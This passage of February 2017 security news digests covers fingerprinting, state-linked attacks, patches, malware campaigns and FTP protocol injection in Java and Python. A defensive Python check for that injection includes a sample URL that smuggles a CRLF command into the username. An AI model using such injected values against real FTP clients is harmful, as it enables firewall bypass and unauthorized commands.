According to Klink, an attacker could use this knowledge to determine specific details about targeted users, based on the intermediate CA certificates cached by their browsers. However, these details would be limited to geolocation, maybe browsing habits, and whether the victim’s browser runs in a sandbox (which would lack cached certificates). The attacker could sell this information to advertising companies or could leverage it to deliver specific content to the targeted users.

“In addition to the purely »statistical« view of having a fingerprint with a sequence of n bits representing the cache status for each tested CA, the fingerprint also contains additional semantic information. Certain CAs have customers mostly in one country or region, or might have even more specific use-cases which lets you infer even more information − i.e. a user who has the »Deutsche Bundestag CA« cached is most probably located in Germany and probably at least somewhat interested in politics,” the researcher explains.

Klink also notes that he contacted Mozilla on the matter in January, but that there are no details on what course of action the organization will take. The “cleanest solution” would be to avoid connecting to incorrectly configured servers, even if the intermediate CA is cached, but “Mozilla is reluctant to implement that without knowing the impact,” the researcher says.

Users can stay protected by regularly cleaning up their profiles, by creating new ones, by cleaning up existing ones from the Firefox UI, or by using the certutil command line tool. They can also block third-party requests with an addon, mainly because “the attack obviously needs to make (a lot of) third-party requests,” Klink concludes.


For the second time in a few months Montenegro suffered massive and prolonged cyberattacks
22.2.2017 securityaffairs Cyber 

For the second time in a few months Montenegro suffered massive and prolonged cyberattacks against government and media websites.
According to the Balkan Insight, attackers have launched a renewed attack on the Montenegrin government and media.

The last wave of cyber attacks started on February 15 and lasted several days, according to the government experts it was a massive offensive coordinated by professional hackers.

“The government in Podgorica has vowed to take action after a series of large-scale, sophisticated and coordinated hacker attacks on the websites of state institutions and pro-government media.” reads the Balkan Insight report.

This isn’t the first time that Montenegro has been targeted by hackers; another massive attack hit the country’s institutions during the October elections, amid speculation that the Russian Government was involved.

Montenegrin authorities are working with other experts of partner countries on attributing the attack and locating the hackers. The government announced plans to tighten cyber security to protect its infrastructure.

According to the Balkan Insight, Montenegro suffered an escalation of cyber attacks in 2016.

“As BIRN reported in January, a new analysis by the Public Administration Ministry on the scale of the cyber threat to Montenegro showed that hacking attacks rose in 2016. Attacks were “much more serious and sophisticated”, it said.” continues the Balkan Insight. “Over 200 attacks on websites, state institutions, online fraud and misuse of personal accounts were reported in 2016, compared with just six in 2012.”


Who is behind the attacks?

Experts suspect the involvement of a nation-state actor because the attacks appear to be politically motivated and highly sophisticated.

“The severity and sophistication of cyber-attacks affecting Montenegro during 2016 were reflected in the increased number of identified attacks on infrastructure and cyber espionage cases, as well as through phishing campaigns which targeted civil servants,” the report said.

Montenegro accused Russia of meddling in the October election, but the Russian Government has always denied any involvement in the cyber attacks.

“Some media close to ruling Democratic Party of Socialists claimed the attacks came from the same Russian hackers allegedly behind recent cyberattacks in the US.” continued the news agency.

According to intelligence analysis, Russia secretly funneled money to anti-NATO opposition parties in the country and set up or co-opted media outlets to undermine former PM Milo Djukanovic’s government.


Microsoft Flaws Mitigated by Removing Admin Rights: Avecto

22.2.2017 securityweek Vulnerebility

Microsoft patched a total of 530 vulnerabilities in 2016 and many of them were mitigated by the removal of administrator rights, according to a report published this week by endpoint security firm Avecto.

Avecto’s Microsoft Vulnerabilities Report for 2016 shows that 189 of the flaws fixed by the tech giant last year were classified as critical, and 94 percent of the Windows issues can be mitigated by removing admin rights. This mitigation works for all critical vulnerabilities affecting Internet Explorer and Edge, and 99 percent of Office flaws.

Roughly two-thirds of all the vulnerabilities affecting Microsoft products can be mitigated using this method. The percentage increased in 2016, but it has been at a fairly steady level over the past years.

According to Avecto, the number of security holes reported to Microsoft has increased by more than 60 percent in the past years, from 333 in 2013 to 530 in 2016. However, judging by the first round of updates for 2017, the number could drop significantly this year.

While Windows 10 has been advertised as the most secure version of the operating system, experts pointed out that it had the highest proportion of vulnerabilities compared to other versions. The number of flaws affecting Windows 10 was nearly 50 percent higher than in Windows 8 and 8.1. Removal of admin rights mitigated 93 percent of Windows 10 vulnerabilities.


“Privilege management and application control should be the cornerstone of your endpoint security strategy, building up from there to create ever stronger, multiple layers of defense. These measures can have a dramatic impact on your ability to mitigate today's attacks,” explained Mark Austin, co-founder and co-CEO of Avecto. “Times have changed; removing admin rights and controlling applications is no longer difficult to achieve.”


Beware! Don't Fall For "Font Wasn't Found" Google Chrome Malware Scam
22.2.2017 thehackernews Virus

Next time when you accidentally or curiously land up on a website with jumbled content prompting you to download a missing font to read the blog by updating the Chrome font pack…
…Just Don't Download and Install It. It's a Trap!
Scammers and hackers are targeting Google Chrome users with this new hacking scam that's incredibly easy to fall for, prompting users to download a fake Google Chrome font pack update just to trick them into installing malware on their systems.
Here's What the Scam is and How it works:
It's a "The 'HoeflerText' font wasn't found" scam.
Security firm NeoSmart Technologies recently identified the malicious campaign while browsing an unnamed WordPress website that had allegedly already been compromised, possibly due to failing to apply timely security updates.
The scam is not a new one identified by NeoSmart; it has been making the rounds since last month.
The hackers are inserting JavaScript into poorly secured, but legitimate websites to modify the text rendering on them, which causes the sites to look all jumbled with mis-encoded text containing symbols and other random characters.

So if Chrome users come across such websites from a search engine result or social media site, the script makes the website unreadable and prompts them to fix the issue by updating their 'Chrome font pack.'
The prompt window says: "The 'HoeflerText' font wasn't found," and you're then asked to update the "Chrome Font Pack." If clicked, it actually installs a trojan on your machine.
The scam can also be used to infect victims' computers with Spora ransomware -- one of the most well-run ransomware operations, discovered at the start of this year, with active infection channels, advanced crypto, and an advanced ransom payment service.
What makes this scam particularly appealing is that everything about the browser message looks legit, from the type of "missing font" and the dialog window to the Chrome logo and the right shade of blue on the "update" button.
How to identify the Scam?
There are several ways to recognize this scam.
First of all, the dialog window has been hard-coded to show that you are running Chrome version 53 even if you actually aren't, which might be a clue that something is not right.
Secondly, there's an issue with the filenames: Clicking the "Update" button proceeds to download an executable file titled "Chrome Font v7.5.1.exe." But this file is not the one shown in the malicious instruction image, which reads "Chrome_Font.exe."
Even if you fail to identify these clues, you may get a standard warning, saying "this file isn't downloaded often," when you try to download the file.
Chrome Does Not Flag it as Malware

However, what's strange is that the Chrome browser doesn't flag the file as malware, but the browser does block it because the file is not downloaded too often, which is a standard warning.
NeoSmart Technologies has since run the malware through VirusTotal, which revealed that currently only 9 out of 59 anti-virus engines in the database accurately identify the file as malware.
So users are always advised to exercise caution when downloading anything from the Internet onto their computers, to keep their antivirus software up to date, and never to fall for a scam asking them to update the Chrome font pack, as Chrome already comes with everything it needs.


Serious Breach Linked to Chinese APTs Comes to Light

22.2.2017 securityweek APT

Several major organizations may have been affected by a breach suffered by an IT services and software provider. The attack, linked to threat actors believed to be located in China, took place in 2015, but it has only now come to light.

A report published earlier this month by RSA describes Kingslayer, a supply chain attack that apparently targeted system administrators in some large organizations. The attackers breached the systems of a company that offers event log analyzers and replaced a legitimate application and its updates with a backdoored version.

The malicious version of the software was delivered between April 9 and April 25, 2015, and it was downloaded by at least one Windows system administrator working for a defense contractor.

While it’s unclear exactly how many organizations downloaded the backdoored software in the April 9-25 timeframe, RSA said the portal that hosted it had numerous subscribers, including four major telecoms providers, over ten western military organizations, more than two dozen Fortune 500 companies, five major defense contractors, and tens of IT solutions providers, government organizations, banks and universities.

While RSA has not named the company whose systems were compromised, investigative journalist Brian Krebs determined that it was Canada-based Altair Technologies Ltd. The company offers firewall log analyzers, a Windows event monitoring product, and a repository of troubleshooting information related to Windows event log messages (EventID.Net).

The EventID.Net website hosted EvLog, the software hijacked by the attackers. A notice posted on the site in June 2016 provides some details on the incident and recommendations for potentially affected users.

However, as Krebs pointed out, the advisory does not appear to have been shared on social media and there was no link to it from anywhere on the site – a link was added this week after the journalist contacted Altair Technologies. The company told Krebs it had no way of knowing who downloaded the software so potential victims were not notified directly either.

While Altair representatives said they don’t expect large organizations to use the EvLog tool, the company’s main website claims the EventID.Net portal has helped millions of users worldwide. SecurityWeek has reached out to Altair Technologies for clarifications.

RSA pointed out that the defense contractor targeted by Kingslayer was attacked only 11 weeks after the breach of Altair’s systems, which suggests that the attackers may have focused on other targets in those 11 weeks.

Evidence uncovered by RSA suggests that the attack was linked to Shell Crew, aka Deep Panda, and Codoso, aka Sunshop Group. Both Shell Crew and Codoso are advanced persistent threat (APT) groups believed to be operating out of China.

RSA also pointed to similarities with another supply chain attack known as the 2014 Monju incident, which targeted a nuclear facility in Japan. That attack was also linked to China.


Microsoft releases security updates for Flash Player, but two disclosed flaws remain unpatched
22.2.2017 securityaffairs Vulnerebility

On Tuesday Microsoft issued the security updates KB 4010250 that address flaws in Adobe Flash Player, but two already disclosed flaws remain unpatched.
On Tuesday Microsoft issued the security updates KB 4010250 that address flaws in Adobe Flash Player. The updates fix the vulnerabilities in Internet Explorer on Windows 8.1 and later, as well as Edge for Windows 10, but two already disclosed flaws remain unpatched.

The bad news is that two already disclosed flaws remain unaddressed by these updates and could be exploited by attackers in the wild.
A few days ago, Microsoft announced that the February patches would be delayed until March due to a last minute issue; in response, Google Project Zero experts published the details of the Remote Code Execution vulnerability in Windows.

On Monday, Microsoft alerted its customers to the incoming patches and urged them to update their systems as soon as possible.

Now Microsoft released the security patches and the company confirmed that “No other security updates are scheduled for release until the next scheduled monthly update release on March 14, 2017.”

Bulletin MS17-005 for Adobe Flash Player addresses critical remote code execution (RCE) vulnerabilities affecting Windows systems.

“Security Update for Adobe Flash Player (4010250) This security update resolves vulnerabilities in Adobe Flash Player when installed on all supported editions of Windows 8.1, Windows Server 2012, Windows Server 2012 R2, Windows RT 8.1, Windows 10, and Windows Server 2016.” reads the security bulletin.

SMB zero-day flaw

As anticipated, the two flaws will remain unpatched until March 14, giving attackers the opportunity to target Windows systems.

The first flaw is a Windows SMB (Server Message Block) vulnerability that affects Windows 8, Windows 10 and Windows Server. It is a memory corruption vulnerability in the SMB protocol that can be exploited by a remote attacker; proof-of-concept exploit code for the flaw was recently released publicly.

The second flaw not addressed by the latest security updates is the one recently disclosed by the Google Project Zero team, which affects Windows operating systems ranging from Windows Vista Service Pack 2 to the latest Windows 10.

Don’t waste time: check for updates on your Windows PC and patch your system immediately to prevent exploitation of the Flash Player software in your browser.


FTP Injection flaws in Java and Python allows firewall bypass
22.2.2017 securityaffairs Vulnerebility

The two programming languages Java and Python are affected by serious FTP injection flaws that can be exploited by hackers to bypass any firewall.
Attackers can trick Java and Python applications into executing rogue FTP commands that would open ports in firewalls.

The unpatched flaws reside in the way the two programming languages handle File Transfer Protocol (FTP) links: neither validates the syntax of the username parameter, allowing attackers to trigger a so-called “protocol injection flaw.” Let’s look at the two flaws in detail:
Java/Python FTP Injection allows attackers to send unauthorized SMTP Emails
Security researcher Alexander Klink published an analysis of the FTP protocol injection vulnerability in Java’s XML eXternal Entity (XXE) handling. The expert explained how to trigger the flaw to inject non-FTP malicious commands inside an FTP connection request.

It is important to highlight that the attack works even if the FTP connection fails, because FTP servers do support authentication but don’t check for the presence of carriage returns (CR) or line feeds (LF) in usernames.

“This attack is particularly interesting in a scenario where you can reach an (unrestricted, maybe not even spam- or malware-filtering) internal mail server from the machine doing the XML parsing.” states the blog post published by Alexander Klink. “It even allows for sending attachments, since the URL length seems to be unrestricted and only limited by available RAM (parsing a 400MB long URL did take more than 32 GBs of RAM for some reason, though ;-)).”

FTP Injection flaws

Java/Python FTP Injection allows attackers to Bypass Firewall
Security researcher Timothy Morgan from Blindspot Security devised a new attack technique leveraging Java/Python FTP injection to bypass firewalls.

The FTP protocol injection flaw could be exploited to trick the target firewall into accepting TCP connections from the web to the vulnerable host’s system on its “high” ports (from 1024 to 65535).

The FTP protocol injection attack relies on an old and well-known security issue in the FTP protocol, classic mode FTP, which many firewall vendors still support by default.

When a classic mode FTP connection is initiated, the firewall temporarily opens the port (typically in the range 1024 to 65535) specified in the PORT command.

Using the FTP protocol injection issue in Java and Python, an attacker only needs to know the targeted host’s internal IP address when the classic mode FTP connection is started.

In order to open a port in the targeted firewall the attackers need to make the following requests:

Determining Internal IP – Identify the victim’s internal IP address; to do so, the attackers “send an URL, see how the client behaves, then try another until the attack is successful.”
Packet Alignment – Determine packet alignment and ensure that the PORT command is injected at the right moment, making the attack work.
Exploit the vulnerability.
Once the firewall bypass process has been worked out, all an attacker needs to do to launch the attack is trick victims into accessing a malicious Java or Python application running on a server.

“If a desktop user could be convinced to visit a malicious website while Java is installed, even if Java applets are disabled, they could still trigger Java Web Start to parse a JNLP (Java Network Launch Protocol) file,” Morgan said. “These files could contain malicious FTP URLs which trigger this bug.” reads the analysis.

“Also note, that since Java parses JNLP files before presenting the user with any security warnings, the attack can be entirely successful without any indication to the user (unless the browser itself warns the user about Java Web Start being launched).”

A similar flaw resides in Python’s urllib2 and urllib libraries, although “this injection appears to be limited to attacks via directory names specified in the URL.”

Both flaws were already reported to the vendors: the FTP protocol injection flaw was reported to the Python team in January 2016 and to Oracle in November 2016, but they are still unpatched.

Morgan has also developed proof-of-concept (PoC) exploit code that he will release only after both Oracle and Python release the necessary security updates.

According to Morgan, his exploit code has been successfully tested against Palo Alto Networks and Cisco ASA firewalls; the list of vulnerable network security devices could include many other systems.

Morgan’s recommendations:

Consider uninstalling Java from all desktop systems. If this is not possible due to legacy application requirements, disable the Java browser plugin from all browsers and disassociate the .jnlp file extension from the Java Web Start binary.
Consider requesting an update to fix these issues from Oracle and the Python Software Foundation. Be sure to apply security updates to all versions of Java and Python, including those running on application servers and appliances.
Disable classic mode FTP in all firewalls, allowing only passive mode.


Czech companies fear hardware failure and careless users

22.2.2017 SecurityWorld Security
Acronis presented the results of its local survey on backup, conducted this January and February among its Czech sales partners.

The survey shows that, when it comes to losing important business data, 83% of Czech companies and organizations fear the failure of their own hardware the most. They most often need to back up physical servers, but the share of backups of virtualized infrastructure is growing rapidly.

Key findings of the local survey:

Regarding the loss of business data, Czech companies and organizations fear the failure or damage of their hardware (83%), careless users (78%) and malware and ransomware attacks (61%);
Most often, companies deal with backing up physical servers (72%), workstations (51%), VMware virtualization (49%) and Hyper-V virtualization (44%);
Currently 88% of business customers prefer a local backup solution, 12% prefer the cloud;
They see ransomware (77%) and social networks (39%) as the riskiest trends of this year;

“In 2016 alone, ransomware caused damage worth 1 billion dollars and has undoubtedly become the number one threat today,” said Zdeněk Bínek, responsible for sales of Acronis solutions on the Czech and Slovak markets. “Because attacks are increasingly sophisticated and target not only standard corporate data but also its backups and the backup systems themselves, it will be increasingly important for backup solutions to include active protection against ransomware. Demand for such solutions will grow the most this year.”


Microsoft releases update for Flash Player, but leaves two disclosed Flaws Unpatched
22.2.2017 thehackernews Vulnerebility

Microsoft on Tuesday released security update (KB 4010250) to patch flaws in Adobe Flash Player for its customers using Internet Explorer on Windows 8.1 and later, as well as Edge for Windows 10, but two already disclosed flaws remain unpatched.
Just last week, Microsoft announced that its February patches would be delayed until March due to a last minute issue, a move that led to Google publishing details of an unpatched Windows bug.
However, the software giant emailed a handful of big businesses to alert them to the incoming patches on Monday, advising them to update their systems as soon as possible.
The security patches are now available to all Windows customers over Windows Update, and "No other security updates are scheduled for release until the next scheduled monthly update release on March 14, 2017," Microsoft says.
Bulletin MS17-005 for Adobe Flash Player addresses remote code execution (RCE) vulnerabilities for some currently supported Windows systems.
The flaws are rated "Critical" for Windows client operating systems to Windows 8.1 and Windows Server 2016, but "Moderate" for Windows Server 2012.
But Microsoft Won't Patch Two Disclosed Flaws Until 14th March
However, two security vulnerabilities, which have already been publicly disclosed with working exploit code, still remain unpatched, giving attackers enough time to target Windows users.
The first is a Windows SMB vulnerability that affects Windows 8, Windows 10 and Windows Server. Proof-of-concept exploit code for this flaw was released just over a week ago.
The other is the flaw disclosed by Google earlier this week that affects Microsoft's Windows operating systems ranging from Windows Vista Service Pack 2 to the latest Windows 10 and that has yet to be patched.
Google disclosed the vulnerability, which resides in the Windows Graphics Device Interface (GDI) library, with a PoC exploit, meaning attackers can exploit the vulnerability before Microsoft issues a patch.
The latest security patches come a week after Microsoft's usual Patch Tuesday.
Since details of the security updates released by Microsoft on Tuesday remain sketchy, what these patches resolve is not currently known.
So if you check for updates on your Windows PC and find one waiting for you, don't be surprised and patch your software immediately to make sure your Flash Player software is secure, though you’ll still be waiting until March 14 for the complete Patch Tuesday fix.


Microsoft Releases Security Update for Flash Player Libraries

22.2.2017 securityweek Vulnerebility

While most of this month’s security updates have been postponed to March 14, Microsoft has decided to release one bulletin to address the Flash Player vulnerabilities fixed by Adobe on Patch Tuesday.

The critical bulletin, MS17-005, resolves 13 vulnerabilities in the Flash Player libraries used by Internet Explorer 10, Internet Explorer 11 and Edge.

The patches, obtainable via Windows Update and the Microsoft Update Catalog, are available for Windows 8, Windows RT 8.1, Windows Server 2012, Windows Server 2012 R2, Windows Server 2016, and Windows 10.

The Flash Player flaws patched by Adobe this month are memory corruption issues that can be exploited for arbitrary code execution. They were reported to the vendor by researchers at Google Project Zero, Microsoft, Palo Alto Networks, Fortinet’s FortiGuard Labs and CloverSec Labs.

There had been no evidence of exploits in the wild, but apparently Microsoft decided that the flaws are serious enough to warrant the release of an out-of-band update.

There are at least two Windows zero-day vulnerabilities that Microsoft is expected to address next month. One of them is a denial-of-service (DoS) flaw caused by how SMB traffic is handled.

The second one is a medium severity information disclosure issue discovered by Google Project Zero researchers. Google made the details of the security hole public after Microsoft failed to release a patch within 90 days.

Microsoft still hasn’t shared any information on why it had to delay the February patches, only saying that it was a last minute issue. Some have speculated that it could have something to do with cumulative updates or an infrastructure problem.


RTM gang is the cybercrime organization that targets remote banking system
22.2.2017 securityweek CyberCrime

Researchers at ESET are monitoring the activity of a cybercrime group tracked as RTM that focuses its criminal operations on Remote Banking Systems.
Experts at software firm ESET are monitoring the activity of a cybercrime group tracked as RTM that uses sophisticated malware written in Delphi to target Remote Banking Systems (RBS). Remote Banking Systems are business software used to make bulk financial transfers.

FinCERT, the Russian CERT involved in the investigation of cybercrime targeting Russian financial institutions, issued a security advisory in 2016.

According to ESET, the RTM gang has been active since 2015 and uses spyware to monitor the victims’ machines.

“This group, active since at least 2015, is using malware, written in Delphi, to spy on its victims in a variety of ways, such as monitoring keystrokes and smart cards inserted into the system.” reads the blog post published by ESET.

The malware allows the RTM gang to monitor the banking-related activities of the victims in real time as well as to exfiltrate data from their PCs.

The malicious code used by the crooks actively searches for export files commonly used by the widespread accounting software “1C: Enterprise 8”, mostly in Russia.

These specific files contain details of bulk transfers and are processed by RBS systems to complete payment orders. By intercepting these files, attackers can modify them in order to hijack payments.

Researchers at ESET highlighted that the same attack technique was also used by other criminal organizations, such as Buhtrap and Corkow, that have also targeted RBS users in the past, slowly building an understanding of the network and building custom tools to steal from corporate victims.

Both groups used custom tools to target RBS systems in the past, and the recent operations conducted by the RTM gang confirm that criminal organizations are looking with interest at this specific type of activity.

RTM mainly targeted financial organizations in Russia and neighboring countries, but the experts warn that other groups using similar tactics are operating in Western Europe.

ESET published a white paper detailing the activities of the RTM gang, enjoy it!


Financial sector hit by a series of attacks, hackers mislead investigators

22.2.2017 SecurityWorld Hacking
In recent months, a wave of organized and sophisticated attacks by unknown hackers has hit financial organizations around the world. The latest findings of investigators show that Russian words were deliberately inserted into the malware sent to banks in order to lead investigators down the wrong track.

Researchers at BAE Systems, a firm focused on cyber security, recently obtained and analyzed malware samples related to the series of attacks. The malware hit 104 organizations in 31 countries, most of them banks.

In the malware, the researchers found several commands and text strings in Russian; the language, however, is so odd that the individual phrases were apparently translated into Russian using online translators. The resulting text makes little sense to a native Russian speaker.

“In some cases the inaccurate translation changed the overall meaning of the words,” the researchers write in a blog post. “This strongly suggests that Russian is not the native language of the attack’s authors and that the use of Russian words is therefore a ‘false flag’.”

The odd behavior is apparently meant to confuse investigators. Some technical evidence, however, indicates that the malware samples and the attacks as a whole can be attributed to a group known in expert circles as Lazarus.

Lazarus has been active since at least 2009 and is blamed for various attacks against governments and private organizations around the world, from South Korea to the USA.

Some experts also lean towards the view that Lazarus is behind the 2014 attack on Sony Pictures Entertainment, in which some private data leaked and several computers were disabled. The FBI and other US intelligence agencies then directly accused North Korea as well.

The name Lazarus is also mentioned in connection with the theft of 81 million dollars from the central bank of Bangladesh at the end of last year. In that attack, the hackers used malware to manipulate the computers the bank used to move funds through the SWIFT network. They attempted to move 951 million in total, but some of the transactions failed and part of the money was later successfully returned to the bank after the attack was detected.

Earlier in February, a malware attack hit several Polish banks; the attacks reportedly originated from a malware-infected website of the Polish financial regulator.

Researchers from BAE Systems and Symantec linked the attacks in Poland to a larger series of attacks that began back in October. Security was breached in a similar way at the national bank of Mexico and at the largest state-owned bank of Uruguay.

The malware used in the attacks shares common traits with tools previously attributed to the Lazarus group.

Several hacking groups of Russian origin specialize in banks. These groups use precisely targeted phishing (spear-phishing) to first establish a foothold in the banks, understand the internal procedures the bank uses, and only then begin stealing money. BAE Systems’ research suggests that Lazarus is trying to make its activity show the same traits as Russian-speaking hacking groups.


Watson goes to cognitive security operations centers

22.2.2017 SecurityWorld Security
IBM Security has announced the availability of Watson for Cyber Security, the industry’s first intelligent technology designed for use in cognitive security operations centers.

Over the past year, Watson learned the language of cyber security and processed more than a million security documents. It will now help security experts analyze thousands of natural-language research reports that have never before been accessible to modern security tools.

According to IBM research, security teams thoroughly analyze an average of more than 200,000 security events per day, leading to more than 20,000 wasted hours per year spent dealing with false alarms.

Introducing cognitive technologies into security operations centers is proving necessary and essential to keep pace with security events, whose number is expected to double in the next five years.

Watson for Cyber Security will be integrated into IBM’s new cognitive security operations center platform, where modern cognitive technology meets security operations. This will make it possible to respond to threats targeting end users, networks and the cloud.

At the core of this platform is IBM QRadar Advisor with Watson, a new application available on the IBM Security App Exchange and the first to use Watson’s cyber security data.

The new application is already used by Avnet, the University of New Brunswick, Sogeti, Sopra Steria and 40 other customers worldwide, with the aim of increasing the number of security events their security analysts can investigate.

Due to the dramatic increase in security incidents, IBM has also invested in research aimed at bringing cognitive tools into the global network of IBM X-Force Command Centers. Part of this research is a Watson-powered chatbot currently used to communicate with IBM Managed Security Services customers.

IBM also introduced a new research project code-named Havyn. It is a unique voice-controlled security assistant that uses Watson’s conversational technology and responds to verbal commands and natural language from security analysts.


Unpatched Python and Java Flaws Let Hackers Bypass Firewall Using FTP Injection
21.2.2017 thehackernews Vulnerebility

These newly discovered bugs in Java and Python are a big deal.
The two popular programming languages, Java and Python, contain similar security flaws that can be exploited to send unauthorized emails and bypass any firewall defenses.
And since both flaws remain unpatched, hackers can take advantage of them to design cyber attack operations against critical networks and infrastructure.
The unpatched flaws actually reside in the way the Java and Python programming languages handle File Transfer Protocol (FTP) links: they don't syntax-check the username parameter, which leads to what researchers call a protocol injection flaw.
Java/Python FTP Injection to Send Unauthorized SMTP Emails

In a blog post published over the past week, security researcher Alexander Klink detailed the FTP protocol injection vulnerability in Java's XML eXternal Entity (XXE) that allows attackers to inject non-FTP malicious commands inside an FTP connection request.
To demonstrate the attack, Alexander showed how to send an unauthorized email via SMTP (Simple Mail Transfer Protocol) in an FTP connection attempt, even though the FTP connection failed, as FTP servers do support authentication but don't check for the presence of carriage returns (CR) or line feeds (LF) in usernames.
"This attack is particularly interesting in a scenario where you can reach an (unrestricted, maybe not even spam- or malware-filtering) internal mail server from the machine doing the XML parsing," Alexander concluded.
Java/Python FTP Injections Allow to Bypass Firewall
However, two days later in a separate security advisory, security researcher Timothy Morgan from Blindspot Security came forward with his findings, showing a more threatening exploitation scenario in which the FTP URL handlers in both Java and Python can be used to bypass firewalls.
Morgan said such FTP protocol injection flaw could be used to trick a victim's firewall into accepting TCP connections from the web to the vulnerable host's system on its "high" ports (from 1024 to 65535).
Besides the FTP protocol injection attack, there is a decade-old security issue in the FTP protocol called classic mode FTP, an insecure mechanism of client-server FTP interaction that many firewall vendors still support by default.
When a classic mode FTP connection is initiated, the firewall temporarily opens a port – typically between 1024 and 65535 – specified in the PORT command, which introduces security risks.
Using the FTP protocol injection issue in Java and Python, an attacker who knows the targeted host’s internal IP address can start a classic mode FTP connection, which attackers can use for nefarious purposes.
Morgan has determined that an attacker can open up one port in the targeted firewall with only three requests:
Identify the victim's internal IP address – this requires an attacker to "send an URL, see how the client behaves, then try another until the attack is successful."
Determine packet alignment and ensure that the PORT command is injected at the right moment, making the attack work.
Exploit the vulnerability.
Each additional request can be used to open up another TCP port.
Easily Exploitable Protocol Injection Flaw
However, the researcher warned that his exploit could be used for man-in-the-middle (MitM) attacks, server-side request forgery (SSRF), XXE attacks and more, and once the firewall is bypassed, desktop hosts can be attacked even if they do not have Java installed.
All an attacker needs is to convince victims into accessing a malicious Java or Python application hosted on a server to bypass the entire firewall.
"If a desktop user could be convinced to visit a malicious website while Java is installed, even if Java applets are disabled, they could still trigger Java Web Start to parse a JNLP (Java Network Launch Protocol) file," Morgan said. "These files could contain malicious FTP URLs which trigger this bug."
"Also note, that since Java parses JNLP files before presenting the user with any security warnings, the attack can be entirely successful without any indication to the user (unless the browser itself warns the user about Java Web Start being launched)."
According to Morgan, a nearly identical flaw also exists in Python's urllib2 and urllib libraries, although "this injection appears to be limited to attacks via directory names specified in the URL."
Protocol Injection Flaw Is Still Unpatched
Morgan said the FTP protocol injection flaw was reported to the Python team in January 2016 and Oracle in November 2016 by his company, but neither of the two has issued any update to address the issue.
Morgan has developed a proof-of-concept (PoC) exploit but is currently holding back publication of his exploit until Oracle and Python respond to the disclosure and release patches.
Morgan's exploit has been successfully tested against Palo Alto Networks and Cisco ASA firewalls, though researchers believe many commercial firewalls are also vulnerable to FTP stream injection attacks.
So until patches become available, Morgan suggests users uninstall Java on their desktops and in browsers, as well as disable support for "classic mode" FTP on all firewalls.
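Until the library fixes land, an application that fetches untrusted URLs can refuse the one ingredient both scenarios above (Klink's SMTP injection and Morgan's firewall bypass, also covered in the securityaffairs write-up earlier on this page) depend on: a CR or LF smuggled into an FTP URL component that the client then copies onto the FTP control channel. The following check is an added example, not code from the article or from either researcher; the URLs in it are constructed samples and the "naive client" model is a simplification, not any real library's exact behaviour.

```python
"""Added example (not from the article, Klink or Morgan): reject FTP URLs whose
components would inject extra command lines into the FTP control channel.
Sample URLs below are constructed for illustration only."""
import re
from typing import List
from urllib.parse import urlsplit, unquote

# Once percent-decoded, any of these ends the current FTP command line
# (USER ..., CWD ...), so whatever follows is read by the server as a new command.
FORBIDDEN = ("\r", "\n", "\0")
_LINE_BREAK = re.compile(r"\r\n|\r|\n")


def ftp_url_injection_components(url: str) -> List[str]:
    """Names of URL components that carry a line break or NUL after decoding.
    An empty list means the URL cannot inject control-channel commands."""
    # A literal CR/LF in the string is rejected before parsing: newer Python
    # versions of urlsplit silently strip those characters, which would hide them.
    if any(ch in url for ch in FORBIDDEN):
        return ["raw"]
    parts = urlsplit(url)
    if parts.scheme.lower() != "ftp":
        return []  # only ftp:// URLs are handed to an FTP client
    bad = []
    for name, value in (("username", parts.username),
                        ("password", parts.password),
                        ("path", parts.path)):
        if value and any(ch in unquote(value) for ch in FORBIDDEN):
            bad.append(name)
    return bad


def is_safe_ftp_url(url: str) -> bool:
    """True when the URL is not ftp:// or has no injectable component."""
    return not ftp_url_injection_components(url)


def naive_control_lines(url: str) -> List[str]:
    """Command lines a naive FTP client would write for the login and the
    directory change implied by the URL (simplified model of the behaviour
    described in the article), split the way the server reads them.
    A clean URL yields one USER line plus at most one CWD line."""
    parts = urlsplit(url)
    user = unquote(parts.username or "anonymous")
    directory = unquote(parts.path.rsplit("/", 1)[0]).strip("/")
    raw = f"USER {user}\r\n"
    if directory:
        raw += f"CWD {directory}\r\n"
    return [line for line in _LINE_BREAK.split(raw) if line]


if __name__ == "__main__":
    # Constructed sample inputs, not real hosts or attack traffic.
    for sample in ("ftp://ftp.example.com/pub/file.txt",
                   "ftp://user%0D%0Ainjected@ftp.example.com/file.txt"):
        print(sample, ftp_url_injection_components(sample),
              naive_control_lines(sample))
```

Pairing this check with Morgan's firewall-side advice (passive mode only) covers both ends: the client never emits the injected line, and the firewall never opens a port on a PORT command it sees in the stream.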


Mirai for Windows Built by Experienced Bot Herder: Kaspersky

21.2.2017 securityweek BotNet

The Windows variant of the infamous Mirai Linux botnet is the offspring of a more experienced bot herder, possibly of Chinese origin, Kaspersky Lab security researchers warn.

Recently detailed by Doctor Web, its main functionality is to spread the Mirai botnet to embedded Linux-based devices. The malware also abuses Windows Management Instrumentation (WMI) to execute commands on remote hosts, and targets Microsoft SQL Server and MySQL servers to create admin accounts and abuse their privileges.

In a report published this week, Kaspersky Lab researchers explain that Mirai for Windows is nothing but a malware spreader and that it shouldn’t be considered a new botnet. However, the new threat features code differences when compared to the original Mirai, which emerged in the second half of last year, targeting insecure Internet of Things (IoT) devices.

The spreader, Kaspersky confirms, was designed to brute force a remote telnet connection to spread Mirai to previously unavailable resources. By targeting Windows, the Trojan has access to Internet facing vulnerable SQL servers running on the platform, which can be connected to IP cameras on private networks, as well as to DVRs, media center software, various Raspberry and Banana Pi devices, and other internal devices.

What the Russia-based security firm underlines, however, is that the Windows bot isn’t actually new, and that some of its components date back as far as 2014, while its functionality can be traced “back to public sources at least as early as 2013.” The threat can spread “Mirai bots to embedded Linux systems over a very limited delivery vector,” the security company also says.

However, the Mirai crossover between the Linux and Windows platforms is unfortunate, and the public availability of botnet’s source code is expected to bring “heavy problems to the internet infrastructure for years to come,” Kaspersky says. The company also believes that this Windows Trojan is only a minor start compared to the issues to come.

The Windows spreader was designed to search for and attack hosts based on a specific list, and to spread the Linux Mirai botnet over telnet. It can also drop a downloader onto the compromised systems, which in turn downloads Mirai.

Mirai for Windows, Kaspersky says, is the work of a more experienced developer. Various artefacts, the word choice in strings, and the fact that the malware was compiled on a Chinese system (the host servers are maintained in Taiwan), suggest that this author might be a Chinese speaker. The fact that this Trojan is using code-signing certificates stolen exclusively from Chinese companies appears to support this idea as well.

“The addition of a Chinese-speaking malware author with access to stolen code-signing certificates, with the ability to rip win32 offensive code from multiple offensive projects effective against MSSQL servers around the world, and the ability to port the code into an effective cross-platform spreading bot, introduces a step up from the juvenile, stagnating, but destructive Mirai botnet operations of 2016,” Kaspersky notes.

